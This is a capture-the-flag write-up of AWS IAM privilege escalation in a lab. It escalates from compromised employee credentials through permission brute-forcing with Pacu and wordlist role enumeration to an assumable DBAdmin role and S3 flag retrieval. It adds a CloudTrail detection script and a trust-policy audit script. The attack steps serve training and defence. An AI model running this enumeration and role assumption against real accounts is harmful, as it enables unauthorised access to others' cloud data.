
Trust Me WriteUp

Welcome to Secure Corp, a leading organization with a growing cloud infrastructure. Recently, a security audit raised concerns about potential misconfigurations in IAM roles and permissions. As a Red Team Specialist, your mission is to investigate IAM permissions, uncover vulnerabilities in the trust relationships of IAM roles, and exploit them to escalate privileges.

Your initial foothold? You’ve gained access to an employee’s AWS credentials. Can you use them to pivot, escalate privileges, and retrieve the flag hidden inside an S3 bucket?

Initial Access:

You start the challenge with the AWS credentials of an employee user. Your objective is to investigate IAM roles, identify misconfigurations, assume a privileged role, and retrieve the hidden flag.

AWS Resources:

The organization has users, roles and policies to manage the workflow, and an S3 bucket to store data.

This detailed write-up demonstrates IAM privilege escalation through misconfigured role trust relationships. Starting from compromised employee credentials, systematic enumeration reveals assumable roles, leading to S3 data access and flag retrieval.

Configure a profile with the employee's credentials and confirm which identity they belong to:

```
$ aws configure --profile Trust_Me
AWS Access Key ID [None]: [REDACTED_AWS_ACCESS_KEY_ID]
AWS Secret Access Key [None]: [REDACTED_AWS_SECRET_ACCESS_KEY]
Default region name [None]: us-east-1
Default output format [None]: json
$ aws sts get-caller-identity --profile Trust_Me
{
    "UserId": "[REDACTED_AWS_USERID]",
    "Account": "058264439561",
    "Arn": "arn:aws:iam::058264439561:user/Backend_Developer"
}
```
Brute-force the user's effective permissions with Pacu:

```
Pacu (trace:imported-Trust_Me) > run iam__bruteforce_permissions
Running module iam__bruteforce_permissions...
[iam__bruteforce_permissions] Enumerated IAM Permissions:
[iam__bruteforce_permissions] Enumerating us-east-1
2025-11-28 13:08:57,972 - 6811 - [INFO] Starting permission enumeration for access-key-id "[REDACTED_AWS_ACCESS_KEY_ID]"
2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account ARN : arn:aws:iam::058264439561:user/Backend_Developer
2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account Id : 058264439561
2025-11-28 13:08:59,565 - 6811 - [INFO] -- Account Path: user/Backend_Developer
2025-11-28 13:08:59,863 - 6811 - [INFO] Attempting common-service describe / list brute force.
2025-11-28 13:09:04,387 - 6811 - [ERROR] Remove globalaccelerator.describe_accelerator_attributes action
2025-11-28 13:09:09,750 - 6811 - [ERROR] Remove codedeploy.get_deployment_target action
2025-11-28 13:09:09,751 - 6811 - [ERROR] Remove codedeploy.batch_get_deployment_targets action
2025-11-28 13:09:11,960 - 6811 - [ERROR] Remove codedeploy.list_deployment_targets action
2025-11-28 13:09:14,377 - 6811 - [INFO] -- dynamodb.describe_endpoints() worked!
2025-11-28 13:09:14,461 - 6811 - [INFO] -- sts.get_session_token() worked!
2025-11-28 13:09:14,751 - 6811 - [INFO] -- sts.get_caller_identity() worked!
```

Key Findings:

  • dynamodb.describe_endpoints()
  • sts.get_session_token()
  • sts.get_caller_identity()
The user has almost no direct permissions, so the next step is to look for roles it can assume. Run assume_role_enum.py against the account with a wordlist of candidate role names:

```
python3 assume_role_enum.py -p Trust_Me -i 058264439561 -w wordlist.txt
Targeting account ID: 058264439561
Starting role enumeration...
{
    "Credentials": {
        "AccessKeyId": "[REDACTED_AWS_ACCESS_KEY_ID]",
        "SecretAccessKey": "[REDACTED_AWS_SECRET_ACCESS_KEY]",
        "SessionToken": "[REDACTED_AWS_SESSION_TOKEN]",
        "Expiration": "[REDACTED]"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "[REDACTED]",
        "Arn": "[REDACTED]"
    }
}
```

The enumeration found that the DBAdmin role is assumable by the current user and returned temporary credentials for it. Create a profile from those credentials:


```
aws configure --profile DBadmin set aws_access_key_id [REDACTED_AWS_ACCESS_KEY_ID]
aws configure --profile DBadmin set aws_secret_access_key [REDACTED_AWS_SECRET_ACCESS_KEY]
aws configure --profile DBadmin set aws_session_token [REDACTED_AWS_SESSION_TOKEN]
```
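The role enumeration above is loud from the defender's side: one principal produces a burst of AccessDenied sts:AssumeRole calls for many different role names, and then a success once a name hits. The following Python script is an added example written for this write-up (it is not part of the challenge, Pacu, or assume_role_enum.py) that detects that pattern in CloudTrail records. It assumes CloudTrail's documented record fields (eventSource, eventName, eventTime, userIdentity.arn, requestParameters.roleArn, and errorCode on failures); the account id, principal names and events below are constructed.

```python
"""Flag role-enumeration bursts in CloudTrail sts:AssumeRole records.

Hypothetical detection helper written for this write-up; it is not part of
the challenge, Pacu, or assume_role_enum.py. It assumes CloudTrail's
documented record fields (eventSource, eventName, eventTime,
userIdentity.arn, requestParameters.roleArn, errorCode on failures).
All events below are constructed samples.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

ACCOUNT = "111111111111"  # constructed account id, not the challenge's
ATTACKER = f"arn:aws:iam::{ACCOUNT}:user/Backend_Developer"
ANALYST = f"arn:aws:iam::{ACCOUNT}:user/Alice"


def _event(ts, principal, role, denied):
    """Build a minimal CloudTrail-shaped AssumeRole record (constructed)."""
    rec = {
        "eventSource": "sts.amazonaws.com",
        "eventName": "AssumeRole",
        "eventTime": ts,
        "userIdentity": {"arn": principal},
        "requestParameters": {"roleArn": f"arn:aws:iam::{ACCOUNT}:role/{role}"},
    }
    if denied:
        rec["errorCode"] = "AccessDenied"
    return rec


# A wordlist-driven guess looks like many denied calls for distinct role
# names in a short window, followed by a success once a name hits.
SAMPLE_EVENTS = [
    _event(f"2025-11-28T13:20:0{i}Z", ATTACKER, name, denied=True)
    for i, name in enumerate(["Admin", "Administrator", "Deploy", "Ops", "Backup", "SRE"])
] + [
    _event("2025-11-28T13:20:07Z", ATTACKER, "DBAdmin", denied=False),
    # Benign: a single successful assumption by another principal.
    _event("2025-11-28T13:25:00Z", ANALYST, "ReadOnly", denied=False),
]


def _ts(record):
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def detect_role_enumeration(events, min_denied=5, window=timedelta(minutes=5)):
    """Return one finding per principal whose AccessDenied AssumeRole calls
    reach `min_denied` inside any `window`, plus the roles that principal
    went on to assume successfully after the first denial."""
    by_principal = defaultdict(list)
    for ev in events:
        if ev.get("eventSource") == "sts.amazonaws.com" and ev.get("eventName") == "AssumeRole":
            by_principal[ev["userIdentity"]["arn"]].append(ev)

    findings = []
    for principal, evs in by_principal.items():
        evs.sort(key=_ts)
        denied = [e for e in evs if e.get("errorCode") == "AccessDenied"]
        # Sliding window over the denied attempts: largest count within `window`.
        peak, start = 0, 0
        for i, e in enumerate(denied):
            while _ts(e) - _ts(denied[start]) > window:
                start += 1
            peak = max(peak, i - start + 1)
        if peak < min_denied:
            continue
        first_denial = _ts(denied[0])
        assumed = sorted({e["requestParameters"]["roleArn"] for e in evs
                          if "errorCode" not in e and _ts(e) >= first_denial})
        findings.append({
            "principal": principal,
            "denied_attempts": len(denied),
            "distinct_roles_tried": len({e["requestParameters"]["roleArn"] for e in denied}),
            "peak_in_window": peak,
            "roles_assumed_after": assumed,
        })
    return findings


if __name__ == "__main__":
    print(json.dumps(detect_role_enumeration(SAMPLE_EVENTS), indent=2))
```

The threshold and window are deliberately loose defaults; in practice the number of distinct role names tried is the better signal than the raw count, since a misconfigured automation retries the same role, while a wordlist walks through many.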
List the policies attached to the assumed role:

```
$ aws iam list-attached-role-policies --role-name DBAdmin --profile DBadmin
{
    "AttachedPolicies": [{
        "PolicyName": "Manager_Access_S3",
        "PolicyArn": "arn:aws:iam::058264439561:policy/Manager_Access_S3"
    }]
}
```
Read the policy document:

```
$ aws iam get-policy-version --policy-arn arn:aws:iam::058264439561:policy/Manager_Access_S3 --version-id v1 --profile DBadmin
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "s3:GetObject",
                        "s3:ListBucket"
                    ],
                    "Effect": "Allow",
                    "Resource": [
                        "arn:aws:s3:::securecorpbakstoragebuk",
                        "arn:aws:s3:::securecorpbakstoragebuk/*"
                    ]
                },
                {
                    "Action": [
                        "iam:ListAttachedRolePolicies",
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion",
                        "iam:GetRolePolicy"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:iam::999909936336:role/DBAdmin"
                },
                {
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:iam::999909936336:policy/Manager_Access_S3"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2024-09-19T12:31:43+00:00"
    }
}
```

Key Permissions Found:

  • s3:GetObject on arn:aws:s3:::securecorpbakstoragebuk/*
  • s3:ListBucket on arn:aws:s3:::securecorpbakstoragebuk
List the bucket with the role's credentials:

```
$ aws s3 ls s3://securecorpbakstoragebuk/ --profile DBadmin
2024-09-19 18:01:57 28 Flag.txt
```
  • The flag is in the bucket; download it:
```
$ aws s3 cp s3://securecorpbakstoragebuk/Flag.txt . --profile DBadmin
download: s3://securecorpbakstoragebuk/Flag.txt to ./Flag.txt
$ cat Flag.txt
[REDACTED_FLAG]
```

Flag: [REDACTED_FLAG]

  • Trust Policy Misconfiguration: the DBAdmin role's trust policy allowed the Backend_Developer user to assume it, so a low-privilege user inherited the role's S3 access.
  • Defense: add MFA and source IP conditions to the trust policy, and monitor AssumeRole events in CloudTrail.
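As an added example (not part of the challenge or of this write-up's own tooling), the following Python script audits a role trust policy for exactly the gaps the defense note names: wildcard or whole-account principals, no MFA condition, and no source IP restriction. It places a trust policy modelled on the misconfiguration beside a hardened version. The policy documents, account id, user names and CIDR are all constructed.

```python
"""Audit an IAM role trust policy for the weaknesses this challenge abuses.

Hypothetical audit helper written for this write-up (not part of the
challenge or of any AWS tooling). It reads a trust policy document in the
standard IAM JSON shape and flags Allow statements that let principals call
sts:AssumeRole without the safeguards the defense note mentions. Both
policy documents below are constructed; the account id is a placeholder.
"""
import re

ACCOUNT = "111111111111"  # placeholder account id, not the challenge's
ACCOUNT_ROOT_RE = re.compile(r"^(arn:aws:iam::\d{12}:root|\d{12})$")

# Models the misconfiguration: the role trusts a developer user outright.
WEAK_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": f"arn:aws:iam::{ACCOUNT}:user/Backend_Developer"},
        "Action": "sts:AssumeRole",
    }],
}

# Hardened form: a dedicated operator identity, MFA required, and the
# request must come from a known address range (constructed CIDR).
HARDENED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": f"arn:aws:iam::{ACCOUNT}:user/DBA_Operator"},
        "Action": "sts:AssumeRole",
        "Condition": {
            "Bool": {"aws:MultiFactorAuthPresent": "true"},
            "IpAddress": {"aws:SourceIp": ["203.0.113.0/24"]},
        },
    }],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _condition_keys(stmt):
    """Lower-cased condition keys across every operator block."""
    keys = set()
    for operator_block in stmt.get("Condition", {}).values():
        keys.update(k.lower() for k in operator_block)
    return keys


def _aws_principals(stmt):
    principal = stmt.get("Principal", {})
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        return _as_list(principal.get("AWS", []))
    return []


def trusted_principals(doc):
    """Every AWS principal that some Allow statement lets assume the role."""
    out = []
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") == "Allow":
            out.extend(_aws_principals(stmt))
    return out


def audit_trust_policy(doc):
    """Return a list of human-readable findings; an empty list means no issue found."""
    findings = []
    for idx, stmt in enumerate(_as_list(doc.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if not actions & {"sts:assumerole", "sts:*", "*"}:
            continue
        principals = _aws_principals(stmt)
        if not principals:
            continue  # service / federated principals are out of scope here
        keys = _condition_keys(stmt)
        for p in principals:
            if p == "*":
                findings.append(f"statement {idx}: wildcard principal '*' may assume the role")
            elif ACCOUNT_ROOT_RE.match(p):
                findings.append(f"statement {idx}: whole account trusted ({p}); any principal "
                                "in it with sts:AssumeRole permission can assume the role")
        if "aws:multifactorauthpresent" not in keys:
            findings.append(f"statement {idx}: no aws:MultiFactorAuthPresent condition")
        if "aws:sourceip" not in keys:
            findings.append(f"statement {idx}: no aws:SourceIp restriction")
    return findings


if __name__ == "__main__":
    for name, doc in [("weak", WEAK_TRUST_POLICY), ("hardened", HARDENED_TRUST_POLICY)]:
        findings = audit_trust_policy(doc)
        print(f"{name}: trusts {trusted_principals(doc)}; {len(findings)} finding(s)")
        for line in findings:
            print("  " + line)
```

The audit deliberately treats a trusted account root the same way as the page's misconfiguration: once an account is trusted, every principal in it that holds sts:AssumeRole in its identity policy can assume the role, so the trust policy alone no longer bounds who gets the role's S3 access.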